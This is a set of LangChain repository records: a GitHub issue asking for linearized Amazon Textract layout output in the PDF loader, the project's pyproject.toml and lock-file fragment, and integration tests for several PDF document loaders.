"jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (<7.2.5)", "sphinx (>=3.5)", "sphinx-lint"] testing = ["big-O", "jaraco.functools", "jaraco.itertools", "more-itertools", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=2.2)", "pytest-ignore-flaky", "pytest-mypy (>=0.9.1)", "pytest-ruff"] [[package]] name = "zstandard" version = "0.21.0" description = "Zstandard bindings for Python" optional = true python-versions = ">=3.7" files = [ {file = "zstandard-0.21.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:649a67643257e3b2cff1c0a73130609679a5673bf389564bc6d4b164d822a7ce"}, {file = "zstandard-0.21.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:144a4fe4be2e747bf9c646deab212666e39048faa4372abb6a250dab0f347a29"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b72060402524ab91e075881f6b6b3f37ab715663313030d0ce983da44960a86f"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8257752b97134477fb4e413529edaa04fc0457361d304c1319573de00ba796b1"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:c053b7c4cbf71cc26808ed67ae955836232f7638444d709bfc302d3e499364fa"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2769730c13638e08b7a983b32cb67775650024632cd0476bf1ba0e6360f5ac7d"}, {file = "zstandard-0.21.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:7d3bc4de588b987f3934ca79140e226785d7b5e47e31756761e48644a45a6766"}, {file = "zstandard-0.21.0-cp310-cp310-win32.whl", hash = "sha256:67829fdb82e7393ca68e543894cd0581a79243cc4ec74a836c305c70a5943f07"}, {file = "zstandard-0.21.0-cp310-cp310-win_amd64.whl", hash = "sha256:e6048a287f8d2d6e8bc67f6b42a766c61923641dd4022b7fd3f7439e17ba5a4d"}, {file = "zstandard-0.21.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7f2afab2c727b6a3d466faee6974a7dad0d9991241c498e7317e5ccf53dbc766"}, {file = "zstandard-0.21.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ff0852da2abe86326b20abae912d0367878dd0854b8931897d44cfeb18985472"}, {file = "zstandard-0.21.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d12fa383e315b62630bd407477d750ec96a0f438447d0e6e496ab67b8b451d39"}, {file = "zstandard-0.21.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f1b9703fe2e6b6811886c44052647df7c37478af1b4a1a9078585806f42e5b15"}, {file = "zstandard-0.21.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:df28aa5c241f59a7ab524f8ad8bb75d9a23f7ed9d501b0fed6d40ec3064784e8"}, {file = "zstandard-0.21.0-cp311-cp311-win32.whl", hash = "sha256:0aad6090ac164a9d237d096c8af241b8dcd015524ac6dbec1330092dba151657"}, {file = "zstandard-0.21.0-cp311-cp311-win_amd64.whl", hash = "sha256:48b6233b5c4cacb7afb0ee6b4f91820afbb6c0e3ae0fa10abbc20000acdf4f11"}, {file = "zstandard-0.21.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:e7d560ce14fd209db6adacce8908244503a009c6c39eee0c10f138996cd66d3e"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1e6e131a4df2eb6f64961cea6f979cdff22d6e0d5516feb0d09492c8fd36f3bc"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e1e0c62a67ff425927898cf43da2cf6b852289ebcc2054514ea9bf121bec10a5"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:1545fb9cb93e043351d0cb2ee73fa0ab32e61298968667bb924aac166278c3fc"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fe6c821eb6870f81d73bf10e5deed80edcac1e63fbc40610e61f340723fd5f7c"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:ddb086ea3b915e50f6604be93f4f64f168d3fc3cef3585bb9a375d5834392d4f"}, {file = "zstandard-0.21.0-cp37-cp37m-win32.whl", hash = "sha256:57ac078ad7333c9db7a74804684099c4c77f98971c151cee18d17a12649bc25c"}, {file = "zstandard-0.21.0-cp37-cp37m-win_amd64.whl", hash = "sha256:1243b01fb7926a5a0417120c57d4c28b25a0200284af0525fddba812d575f605"}, {file = "zstandard-0.21.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ea68b1ba4f9678ac3d3e370d96442a6332d431e5050223626bdce748692226ea"}, {file = "zstandard-0.21.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8070c1cdb4587a8aa038638acda3bd97c43c59e1e31705f2766d5576b329e97c"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4af612c96599b17e4930fe58bffd6514e6c25509d120f4eae6031b7595912f85"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cff891e37b167bc477f35562cda1248acc115dbafbea4f3af54ec70821090965"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:a9fec02ce2b38e8b2e86079ff0b912445495e8ab0b137f9c0505f88ad0d61296"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0bdbe350691dec3078b187b8304e6a9c4d9db3eb2d50ab5b1d748533e746d099"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:b69cccd06a4a0a1d9fb3ec9a97600055cf03030ed7048d4bcb88c574f7895773"}, {file = "zstandard-0.21.0-cp38-cp38-win32.whl", hash = "sha256:9980489f066a391c5572bc7dc471e903fb134e0b0001ea9b1d3eff85af0a6f1b"}, {file = "zstandard-0.21.0-cp38-cp38-win_amd64.whl", hash = "sha256:0e1e94a9d9e35dc04bf90055e914077c80b1e0c15454cc5419e82529d3e70728"}, {file = "zstandard-0.21.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d2d61675b2a73edcef5e327e38eb62bdfc89009960f0e3991eae5cc3d54718de"}, {file = "zstandard-0.21.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:25fbfef672ad798afab12e8fd204d122fca3bc8e2dcb0a2ba73bf0a0ac0f5f07"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:62957069a7c2626ae80023998757e27bd28d933b165c487ab6f83ad3337f773d"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:14e10ed461e4807471075d4b7a2af51f5234c8f1e2a0c1d37d5ca49aaaad49e8"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:9cff89a036c639a6a9299bf19e16bfb9ac7def9a7634c52c257166db09d950e7"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:52b2b5e3e7670bd25835e0e0730a236f2b0df87672d99d3bf4bf87248aa659fb"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:b1367da0dde8ae5040ef0413fb57b5baeac39d8931c70536d5f013b11d3fc3a5"}, {file = "zstandard-0.21.0-cp39-cp39-win32.whl", hash = "sha256:db62cbe7a965e68ad2217a056107cc43d41764c66c895be05cf9c8b19578ce9c"}, {file = "zstandard-0.21.0-cp39-cp39-win_amd64.whl", hash = "sha256:a8d200617d5c876221304b0e3fe43307adde291b4a897e7b0617a61611dfff6a"}, {file = "zstandard-0.21.0.tar.gz", hash = "sha256:f08e3a10d01a247877e4cb61a82a319ea746c356a3786558bed2481e6c405546"}, ] [package.dependencies] cffi = {version = ">=1.11", markers = "platform_python_implementation == \"PyPy\""} [package.extras] cffi = ["cffi (>=1.11)"] [extras] all = ["O365", "aleph-alpha-client", "amadeus", "arxiv", "atlassian-python-api", "awadb", "azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "azure-cosmos", "azure-identity", "beautifulsoup4", "clarifai", "clickhouse-connect", "cohere", "deeplake", "docarray", "duckduckgo-search", "elasticsearch", "esprima", "faiss-cpu", "google-api-python-client", "google-auth", "google-search-results", "gptcache", "html2text", "huggingface_hub", "jinja2", "jq", "lancedb", "langkit", "lark", "librosa", "lxml", "manifest-ml", "marqo", "momento", "nebula3-python", "neo4j", "networkx", "nlpcloud", "nltk", "nomic", "openai", "openlm", "opensearch-py", "pdfminer-six", "pexpect", "pgvector", "pinecone-client", "pinecone-text", "psycopg2-binary", "pymongo", "pyowm", "pypdf", "pytesseract", "python-arango", "pyvespa", "qdrant-client", "rdflib", "redis", "requests-toolbelt", "sentence-transformers", "singlestoredb", "tensorflow-text", "tigrisdb", "tiktoken", "torch", "transformers", "weaviate-client", "wikipedia", "wolframalpha"] azure = ["azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "azure-core", "azure-cosmos", "azure-identity", "azure-search-documents", "openai"] clarifai = ["clarifai"] cli = ["typer"] cohere = ["cohere"] docarray = ["docarray"] embeddings = ["sentence-transformers"] extended-testing = ["aiosqlite", "aleph-alpha-client", "amazon-textract-caller", "anthropic", "arxiv", "assemblyai", "atlassian-python-api", "beautifulsoup4", "bibtexparser", "cassio", "chardet", "dashvector", "esprima", "faiss-cpu", "feedparser", "geopandas", "gitpython", "google-cloud-documentai", "gql", "html2text", "jinja2", "jq", "jsonschema", "lxml", "markdownify", "motor", "mwparserfromhell", "mwxml", "newspaper3k", "numexpr", "openai", "openai", "openapi-pydantic", "pandas", "pdfminer-six", "pgvector", "psychicapi", "py-trello", "pymupdf", "pypdf", "pypdfium2", "pyspark", "rank-bm25", "rapidfuzz", "rapidocr-onnxruntime", "requests-toolbelt", "rspace_client", "scikit-learn", "sqlite-vss", "streamlit", "sympy", "telethon", "timescale-vector", "tqdm", "upstash-redis", "xata", "xmltodict"] javascript = ["esprima"] llms = ["clarifai", "cohere", "huggingface_hub", "manifest-ml", "nlpcloud", "openai", "openlm", "torch", "transformers"] openai = ["openai", "tiktoken"] qdrant = ["qdrant-client"] text-helpers = ["chardet"] [metadata] lock-version = "2.0" python-versions = ">=3.8.1,<4.0" content-hash = "9345cd37346e9f369702f51b7e10dde8da91d5f7b659c8c204e5b46c360cd028"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints. Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call ### Motivation Improve downstream LLM accuracy ### Your contribution I'll submit a PR for this feature.
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
libs/langchain/pyproject.toml
[tool.poetry] name = "langchain" version = "0.0.326" description = "Building applications with LLMs through composability" authors = [] license = "MIT" readme = "README.md" repository = "https://github.com/langchain-ai/langchain" [tool.poetry.scripts] langchain-server = "langchain.server:main" [tool.poetry.dependencies] python = ">=3.8.1,<4.0" pydantic = ">=1,<3" SQLAlchemy = ">=1.4,<3" requests = "^2" PyYAML = ">=5.3" numpy = "^1" azure-core = {version = "^1.26.4", optional=true} tqdm = {version = ">=4.48.0", optional = true} openapi-pydantic = {version = "^0.3.2", optional = true} faiss-cpu = {version = "^1", optional = true} wikipedia = {version = "^1", optional = true} elasticsearch = {version = "^8", optional = true} opensearch-py = {version = "^2.0.0", optional = true} redis = {version = "^4", optional = true} manifest-ml = {version = "^0.0.1", optional = true} nltk = {version = "^3", optional = true} transformers = {version = "^4", optional = true} beautifulsoup4 = {version = "^4", optional = true} torch = {version = ">=1,<3", optional = true} jinja2 = {version = "^3", optional = true} tiktoken = {version = ">=0.3.2,<0.6.0", optional = true, python=">=3.9"} pinecone-client = {version = "^2", optional = true} pinecone-text = {version = "^0.4.2", optional = true} pymongo = {version = "^4.3.3", optional = true} clickhouse-connect = {version="^0.5.14", optional=true} weaviate-client = {version = "^3", optional = true} marqo = {version = "^1.2.4", optional=true} google-api-python-client = {version = "2.70.0", optional = true} google-auth = {version = "^2.18.1", optional = true} wolframalpha = {version = "5.0.0", optional = true} qdrant-client = {version = "^1.3.1", optional = true, python = ">=3.8.1,<3.12"} dataclasses-json = ">= 0.5.7, < 0.7" tensorflow-text = {version = "^2.11.0", optional = true, python = "^3.10, <3.12"} tenacity = "^8.1.0" cohere = {version = "^4", optional = true} openai = {version = "^0", optional = true} nlpcloud = {version = "^1", optional = true} nomic = {version = "^1.0.43", optional = true} huggingface_hub = {version = "^0", optional = true} google-search-results = {version = "^2", optional = true} sentence-transformers = {version = "^2", optional = true} aiohttp = "^3.8.3" arxiv = {version = "^1.4", optional = true} pypdf = {version = "^3.4.0", optional = true} networkx = {version=">=2.6.3, <4", optional = true} aleph-alpha-client = {version="^2.15.0", optional = true} deeplake = {version = "^3.8.3", optional = true} pgvector = {version = "^0.1.6", optional = true} psycopg2-binary = {version = "^2.9.5", optional = true} pyowm = {version = "^3.3.0", optional = true} async-timeout = {version = "^4.0.0", python = "<3.11"} azure-identity = {version = "^1.12.0", optional=true} gptcache = {version = ">=0.1.7", optional = true} atlassian-python-api = {version = "^3.36.0", optional=true} pytesseract = {version = "^0.3.10", optional=true} html2text = {version="^2020.1.16", optional=true} numexpr = {version="^2.8.6", optional=true} duckduckgo-search = {version="^3.8.3", optional=true} azure-cosmos = {version="^4.4.0b1", optional=true} lark = {version="^1.1.5", optional=true} lancedb = {version = "^0.1", optional = true} pexpect = {version = "^4.8.0", optional = true} pyvespa = {version = "^0.33.0", optional = true} O365 = {version = "^2.0.26", optional = true} jq = {version = "^1.4.1", optional = true} pdfminer-six = {version = "^20221105", optional = true} docarray = {version="^0.32.0", extras=["hnswlib"], optional=true} lxml = {version = "^4.9.2", optional = true} pymupdf = {version = "^1.22.3", optional = true} rapidocr-onnxruntime = {version = "^1.3.2", optional = true, python = ">=3.8.1,<3.12"} pypdfium2 = {version = "^4.10.0", optional = true} gql = {version = "^3.4.1", optional = true} pandas = {version = "^2.0.1", optional = true} telethon = {version = "^1.28.5", optional = true} neo4j = {version = "^5.8.1", optional = true} langkit = {version = ">=0.0.6, <0.1.0", optional = true} chardet = {version="^5.1.0", optional=true} requests-toolbelt = {version = "^1.0.0", optional = true} openlm = {version = "^0.0.5", optional = true} scikit-learn = {version = "^1.2.2", optional = true} azure-ai-formrecognizer = {version = "^3.2.1", optional = true} azure-ai-vision = {version = "^0.11.1b1", optional = true} azure-cognitiveservices-speech = {version = "^1.28.0", optional = true} py-trello = {version = "^0.19.0", optional = true} momento = {version = "^1.10.1", optional = true} bibtexparser = {version = "^1.4.0", optional = true} singlestoredb = {version = "^0.7.1", optional = true} pyspark = {version = "^3.4.0", optional = true} clarifai = {version = ">=9.1.0", optional = true} tigrisdb = {version = "^1.0.0b6", optional = true} nebula3-python = {version = "^3.4.0", optional = true} mwparserfromhell = {version = "^0.6.4", optional = true} mwxml = {version = "^0.3.3", optional = true} awadb = {version = "^0.3.9", optional = true} azure-search-documents = {version = "11.4.0b8", optional = true} esprima = {version = "^4.0.1", optional = true} streamlit = {version = "^1.18.0", optional = true, python = ">=3.8.1,<3.9.7 || >3.9.7,<4.0"} psychicapi = {version = "^0.8.0", optional = true} cassio = {version = "^0.1.0", optional = true} rdflib = {version = "^6.3.2", optional = true} sympy = {version = "^1.12", optional = true} rapidfuzz = {version = "^3.1.1", optional = true} jsonschema = {version = ">1", optional = true} langsmith = "~0.0.52" rank-bm25 = {version = "^0.2.2", optional = true} amadeus = {version = ">=8.1.0", optional = true} geopandas = {version = "^0.13.1", optional = true} python-arango = {version = "^7.5.9", optional = true} gitpython = {version = "^3.1.32", optional = true} librosa = {version="^0.10.0.post2", optional = true } feedparser = {version = "^6.0.10", optional = true} newspaper3k = {version = "^0.2.8", optional = true} amazon-textract-caller = {version = "<2", optional = true} xata = {version = "^1.0.0a7", optional = true} xmltodict = {version = "^0.13.0", optional = true} markdownify = {version = "^0.11.6", optional = true} assemblyai = {version = "^0.17.0", optional = true} dashvector = {version = "^1.0.1", optional = true} sqlite-vss = {version = "^0.1.2", optional = true} motor = {version = "^3.3.1", optional = true} anyio = "<4.0" jsonpatch = "^1.33" timescale-vector = {version = "^0.0.1", optional = true} typer = {version= "^0.9.0", optional = true} anthropic = {version = "^0.3.11", optional = true} aiosqlite = {version = "^0.19.0", optional = true} rspace_client = {version = "^2.5.0", optional = true} upstash-redis = {version = "^0.15.0", optional = true} google-cloud-documentai = {version = "^2.20.1", optional = true} [tool.poetry.group.test.dependencies] # The only dependencies that should be added are # dependencies used for running tests (e.g., pytest, freezegun, response). # Any dependencies that do not meet that criteria will be removed. pytest = "^7.3.0" pytest-cov = "^4.0.0" pytest-dotenv = "^0.5.2" duckdb-engine = "^0.9.2" pytest-watcher = "^0.2.6" freezegun = "^1.2.2" responses = "^0.22.0" pytest-asyncio = "^0.20.3" lark = "^1.1.5" pandas = "^2.0.0" pytest-mock = "^3.10.0" pytest-socket = "^0.6.0" syrupy = "^4.0.2" requests-mock = "^1.11.0" [tool.poetry.group.codespell.dependencies] codespell = "^2.2.0" [tool.poetry.group.test_integration] optional = true [tool.poetry.group.test_integration.dependencies] # Do not add dependencies in the test_integration group # Instead: # 1. Add an optional dependency to the main group # poetry add --optional [package name] # 2. Add the package name to the extended_testing extra (find it below) # 3. Relock the poetry file # poetry lock --no-update # 4. Favor unit tests not integration tests. # Use the @pytest.mark.requires(pkg_name) decorator in unit_tests. # Your tests should not rely on network access, as it prevents other # developers from being able to easily run them. # Instead write unit tests that use the `responses` library or mock.patch with # fixtures. Keep the fixtures minimal. # See CONTRIBUTING.md for more instructions on working with optional dependencies. # https://github.com/langchain-ai/langchain/blob/master/.github/CONTRIBUTING.md#working-with-optional-dependencies pytest-vcr = "^1.0.2" wrapt = "^1.15.0" openai = "^0.27.4" python-dotenv = "^1.0.0" cassio = "^0.1.0" tiktoken = "^0.3.2" anthropic = "^0.3.11" [tool.poetry.group.lint.dependencies] ruff = "^0.1" types-toml = "^0.10.8.1" types-redis = "^4.3.21.6" types-pytz = "^2023.3.0.0" black = "^23.10.0" types-chardet = "^5.0.4.6" mypy-protobuf = "^3.0.0" [tool.poetry.group.typing.dependencies] mypy = "^0.991" types-pyyaml = "^6.0.12.2" types-requests = "^2.28.11.5" [tool.poetry.group.dev] optional = true [tool.poetry.group.dev.dependencies] jupyter = "^1.0.0" playwright = "^1.28.0" setuptools = "^67.6.1" [tool.poetry.extras] llms = ["clarifai", "cohere", "openai", "openlm", "nlpcloud", "huggingface_hub", "manifest-ml", "torch", "transformers"] qdrant = ["qdrant-client"] openai = ["openai", "tiktoken"] text_helpers = ["chardet"] clarifai = ["clarifai"] cohere = ["cohere"] docarray = ["docarray"] embeddings = ["sentence-transformers"] javascript = ["esprima"] azure = [ "azure-identity", "azure-cosmos", "openai", "azure-core", "azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "azure-search-documents", ] all = [ "clarifai", "cohere", "openai", "nlpcloud", "huggingface_hub", "manifest-ml", "elasticsearch", "opensearch-py", "google-search-results", "faiss-cpu", "sentence-transformers", "transformers", "nltk", "wikipedia", "beautifulsoup4", "tiktoken", "torch", "jinja2", "pinecone-client", "pinecone-text", "marqo", "pymongo", "weaviate-client", "redis", "google-api-python-client", "google-auth", "wolframalpha", "qdrant-client", "tensorflow-text", "pypdf", "networkx", "nomic", "aleph-alpha-client", "deeplake", "pgvector", "psycopg2-binary", "pyowm", "pytesseract", "html2text", "atlassian-python-api", "gptcache", "duckduckgo-search", "arxiv", "azure-identity", "clickhouse-connect", "azure-cosmos", "lancedb", "langkit", "lark", "pexpect", "pyvespa", "O365", "jq", "docarray", "pdfminer-six", "lxml", "requests-toolbelt", "neo4j", "openlm", "azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "momento", "singlestoredb", "tigrisdb", "nebula3-python", "awadb", "esprima", "rdflib", "amadeus", "librosa", "python-arango", ] cli = [ "typer" ] # An extra used to be able to add extended testing. # Please use new-line on formatting to make it easier to add new packages without # merge-conflicts extended_testing = [ "aleph-alpha-client", "amazon-textract-caller", "aiosqlite", "assemblyai", "beautifulsoup4", "bibtexparser", "cassio", "chardet", "google-cloud-documentai", "esprima", "jq", "pdfminer-six", "pgvector", "pypdf", "pymupdf", "pypdfium2", "tqdm", "lxml", "atlassian-python-api", "mwparserfromhell", "mwxml", "pandas", "telethon", "psychicapi", "gql", "requests-toolbelt", "html2text", "numexpr", "py-trello", "scikit-learn", "streamlit", "pyspark", "openai", "sympy", "rapidfuzz", "jsonschema", "openai", "rank-bm25", "geopandas", "jinja2", "gitpython", "newspaper3k", "feedparser", "xata", "xmltodict", "faiss-cpu", "openapi-pydantic", "markdownify", "arxiv", "dashvector", "sqlite-vss", "rapidocr-onnxruntime", "motor", "timescale-vector", "anthropic", "upstash-redis", "rspace_client", ] [tool.ruff] select = [ "E", # pycodestyle "F", # pyflakes "I", # isort ] exclude = [ "tests/integration_tests/examples/non-utf8-encoding.py", ] [tool.mypy] ignore_missing_imports = "True" disallow_untyped_defs = "True" exclude = ["notebooks", "examples", "example_data"] [tool.coverage.run] omit = [ "tests/*", ] [build-system] requires = ["poetry-core>=1.0.0"] build-backend = "poetry.core.masonry.api" [tool.pytest.ini_options] # --strict-markers will raise errors on unknown marks. # https://docs.pytest.org/en/7.1.x/how-to/mark.html#raising-errors-on-unknown-marks # # https://docs.pytest.org/en/7.1.x/reference/reference.html # --strict-config any warnings encountered while parsing the `pytest` # section of the configuration file raise errors. # # https://github.com/tophat/syrupy # --snapshot-warn-unused Prints a warning on unused snapshots rather than fail the test suite. addopts = "--strict-markers --strict-config --durations=5 --snapshot-warn-unused -vv" # Registering custom markers. # https://docs.pytest.org/en/7.1.x/example/markers.html#registering-markers markers = [ "requires: mark tests as requiring a specific library", "scheduled: mark tests to run in scheduled testing", "compile: mark placeholder test used to compile integration tests without running them" ] [tool.codespell] skip = '.git,*.pdf,*.svg,*.pdf,*.yaml,*.ipynb,poetry.lock,*.min.js,*.css,package-lock.json,example_data,_dist,examples' # Ignore latin etc ignore-regex = '.*(Stati Uniti|Tense=Pres).*' # whats is a typo but used frequently in queries so kept as is # aapply - async apply # unsecure - typo but part of API, decided to not bother for now ignore-words-list = 'momento,collison,ned,foor,reworkd,parth,whats,aapply,mysogyny,unsecure,damon,crate,aadd,symbl,precesses,accademia,nin'
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints. Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call ### Motivation Improve downstream LLM accuracy ### Your contribution I'll submit a PR for this feature.
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
libs/langchain/tests/integration_tests/document_loaders/test_pdf.py
from pathlib import Path from typing import Sequence, Union import pytest from langchain.document_loaders import ( AmazonTextractPDFLoader, MathpixPDFLoader, PDFMinerLoader, PDFMinerPDFasHTMLLoader, PyMuPDFLoader, PyPDFium2Loader, PyPDFLoader, UnstructuredPDFLoader, ) def test_unstructured_pdf_loader_elements_mode() -> None: """Test unstructured loader with various modes.""" file_path = Path(__file__).parent.parent / "examples/hello.pdf" loader = UnstructuredPDFLoader(str(file_path), mode="elements") docs = loader.load() assert len(docs) == 2 def test_unstructured_pdf_loader_paged_mode() -> None: """Test unstructured loader with various modes.""" file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf" loader = UnstructuredPDFLoader(str(file_path), mode="paged") docs = loader.load() assert len(docs) == 16 def test_unstructured_pdf_loader_default_mode() -> None: """Test unstructured loader.""" file_path = Path(__file__).parent.parent / "examples/hello.pdf" loader = UnstructuredPDFLoader(str(file_path)) docs = loader.load() assert len(docs) == 1 def test_pdfminer_loader() -> None: """Test PDFMiner loader.""" file_path = Path(__file__).parent.parent / "examples/hello.pdf" loader = PDFMinerLoader(str(file_path)) docs = loader.load() assert len(docs) == 1 file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf" loader = PDFMinerLoader(str(file_path)) docs = loader.load() assert len(docs) == 1 def test_pdfminer_pdf_as_html_loader() -> None: """Test PDFMinerPDFasHTMLLoader.""" file_path = Path(__file__).parent.parent / "examples/hello.pdf" loader = PDFMinerPDFasHTMLLoader(str(file_path)) docs = loader.load() assert len(docs) == 1 file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf" loader = PDFMinerPDFasHTMLLoader(str(file_path)) docs = loader.load() assert len(docs) == 1 def test_pypdf_loader() -> None: """Test PyPDFLoader.""" file_path = Path(__file__).parent.parent / "examples/hello.pdf" loader = PyPDFLoader(str(file_path)) docs = loader.load() assert len(docs) == 1 file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf" loader = PyPDFLoader(str(file_path)) docs = loader.load() assert len(docs) == 16 def test_pypdfium2_loader() -> None: """Test PyPDFium2Loader.""" file_path = Path(__file__).parent.parent / "examples/hello.pdf" loader = PyPDFium2Loader(str(file_path)) docs = loader.load() assert len(docs) == 1 file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf" loader = PyPDFium2Loader(str(file_path)) docs = loader.load() assert len(docs) == 16 def test_pymupdf_loader() -> None: """Test PyMuPDF loader.""" file_path = Path(__file__).parent.parent / "examples/hello.pdf" loader = PyMuPDFLoader(str(file_path)) docs = loader.load() assert len(docs) == 1 file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf" loader = PyMuPDFLoader(str(file_path)) docs = loader.load() assert len(docs) == 16 assert loader.web_path is None web_path = "https://people.sc.fsu.edu/~jpeterson/hello_world.pdf" loader = PyMuPDFLoader(web_path) docs = loader.load() assert loader.web_path == web_path assert loader.file_path != web_path assert len(docs) == 1 def test_mathpix_loader() -> None: file_path = Path(__file__).parent.parent / "examples/hello.pdf" loader = MathpixPDFLoader(str(file_path)) docs = loader.load() assert len(docs) == 1 print(docs[0].page_content) file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf" loader = MathpixPDFLoader(str(file_path)) docs = loader.load() assert len(docs) == 1 print(docs[0].page_content) @pytest.mark.parametrize( "file_path, features, docs_length, create_client", [ ( ( "https://amazon-textract-public-content.s3.us-east-2.amazonaws.com" "/langchain/alejandro_rosalez_sample_1.jpg" ), ["FORMS", "TABLES"], 1, False, ), (str(Path(__file__).parent.parent / "examples/hello.pdf"), ["FORMS"], 1, False), ( "s3://amazon-textract-public-content/langchain/layout-parser-paper.pdf", None, 16, True, ), ], ) @pytest.mark.skip(reason="Requires AWS credentials to run") def test_amazontextract_loader( file_path: str, features: Union[Sequence[str], None], docs_length: int, create_client: bool, ) -> None: if create_client: import boto3 textract_client = boto3.client("textract", region_name="us-east-2") loader = AmazonTextractPDFLoader( file_path, textract_features=features, client=textract_client ) else: loader = AmazonTextractPDFLoader(file_path, textract_features=features) docs = loader.load() assert len(docs) == docs_length @pytest.mark.skip(reason="Requires AWS credentials to run") def test_amazontextract_loader_failures() -> None: # 2-page PDF local file system two_page_pdf = str( Path(__file__).parent.parent / "examples/multi-page-forms-sample-2-page.pdf" ) loader = AmazonTextractPDFLoader(two_page_pdf) with pytest.raises(ValueError): loader.load()
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,943
